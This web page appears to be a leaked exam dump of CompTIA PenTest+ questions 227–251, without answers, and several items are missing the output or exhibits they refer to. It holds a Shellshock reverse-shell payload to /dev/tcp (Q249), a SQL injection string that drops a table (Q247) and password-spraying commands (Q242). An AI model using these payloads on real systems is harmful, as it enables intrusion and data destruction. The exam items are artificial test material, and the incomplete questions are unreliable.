100% PASS RATE CompTIA PenTest+ PT0-002 Certified Exam DUMP with 400 Questions [Q227-Q251]

June 23, 2024 PT0-002, CompTIA 0 Comments

100% PASS RATE CompTIA PenTest+ PT0-002 Certified Exam DUMP with 400 Questions [Q227-Q251]

Rate this post

100% PASS RATE CompTIA PenTest+ PT0-002 Certified Exam DUMP with 400 Questions

Updates For the Latest PT0-002 Free Exam Study Guide!

Candidates for the CompTIA PT0-002 exam should have a solid understanding of networking technologies, operating systems, and software development. They should also possess knowledge of cybersecurity principles and practices. Candidates who pass the CompTIA PT0-002 exam can gain a competitive edge in the job market and potentially earn higher salaries.

QUESTION 227
Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?

Executive summary

Vulnerability severity rating

Recommendations of mitigation

Methodology

QUESTION 228
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?

OWASP Web Security Testing Guide

PTES technical guidelines

NIST SP 800-115

OSSTMM

QUESTION 229
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

QUESTION 230
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
Have a full TCP connection
Send a “hello” payload
Walt for a response
Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

Run nmap -Pn -sV -script vuln <IP address>.

Employ an OpenVAS simple scan against the TCP port of the host.

Create a script in the Lua language and use it with NSE.

Perform a credentialed scan with Nessus.

QUESTION 231
A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.
INSTRUCTIONS
Select the tool the penetration tester should use for further investigation.
Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

QUESTION 232
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

Wait for the next login and perform a downgrade attack on the server.

Capture traffic using Wireshark.

Perform a brute-force attack over the server.

Use an FTP exploit against the server.

QUESTION 233
A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

CentOS

Arch Linux

Windows Server

Ubuntu

QUESTION 234
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

Wireshark

Nessus

Retina

Burp Suite

Shodan

Nikto

QUESTION 235
A penetration tester issues the following command after obtaining a low-privilege reverse shell: wmic service get name,pathname,startmode Which of the following is the most likely reason the penetration tester ran this command?

To search for passwords in the service directory

To list scheduled tasks that may be exploitable

To register a service to run as System

To find services that have unquoted service paths

QUESTION 236
The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A birthday attack on 64-bit ciphers (Sweet32)

An attack that breaks RC4 encryption

An attack on a session ticket extension (Ticketbleed)

A Heartbleed attack

QUESTION 237
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

Telnet

HTTP

SMTP

DNS

NTP

SNMP

QUESTION 238
The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.

This device is most likely a gateway with in-band management services.

This device is most likely a proxy server forwarding requests over TCP/443.

This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

QUESTION 239
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

Perform XSS.

Conduct a watering-hole attack.

Use BeEF.

Use browser autopwn.

QUESTION 240
Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?

CeWL

John the Ripper

Hashcat

Hydra

QUESTION 241
A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

CentOS

Arch Linux

Windows Server

Ubuntu

QUESTION 242
A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?

enum4linux -u userl -p /passwordList.txt 192.168.0.1

enum4linux -u userl -p Passwordl 192.168.0.1

cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt

cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

QUESTION 243
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

will reveal vulnerabilities in the Modbus protocol.

may cause unintended failures in control systems.

may reduce the true positive rate of findings.

will create a denial-of-service condition on the IP networks.

QUESTION 244
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

Familiarity and likeness

Authority and urgency

Scarcity and fear

Social proof and greed

QUESTION 245
A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

Bluejacking

Bluesnarfing

BLE attack

WPS PIN attack

QUESTION 246
After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

Metadata service attack

Container escape techniques

Credential harvesting

Resource exhaustion

QUESTION 247
A penetration tester conducted an assessment on a web server. The logs from this session show the following:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ‘ ; DROP TABLE SERVICES; —
Which of the following attacks is being attempted?

Clickjacking

Session hijacking

Parameter pollution

Cookie hijacking

Cross-site scripting

QUESTION 248
During an assessment, a penetration tester was able to access the organization’s wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

Changing to Wi-Fi equipment that supports strong encryption

Using directional antennae

Using WEP encryption

Disabling Wi-Fi

QUESTION 249
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

exploits = {“User-Agent”: “() { ignored;};/bin/bash -i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

exploits = {“User-Agent”: “() { ignored;};/bin/bash -i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

exploits = {“User-Agent”: “() { ignored;};/bin/sh -i ps -ef” 0>&1″, “Accept”: “text/html,application/xhtml+xml,application/xml”}

exploits = {“User-Agent”: “() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80″ 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

QUESTION 250
A penetration tester discovers passwords in a publicly available data breach during the reconnaissance phase of the penetration test. Which of the following is the best action for the tester to take?

Add the passwords to an appendix in the penetration test report.

Do nothing. Using passwords from breached data is unethical.

Contact the client and inform them of the breach.

Use the passwords in a credential stuffing attack when the external penetration test begins.

QUESTION 251
You are a penetration tester reviewing a client’s website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.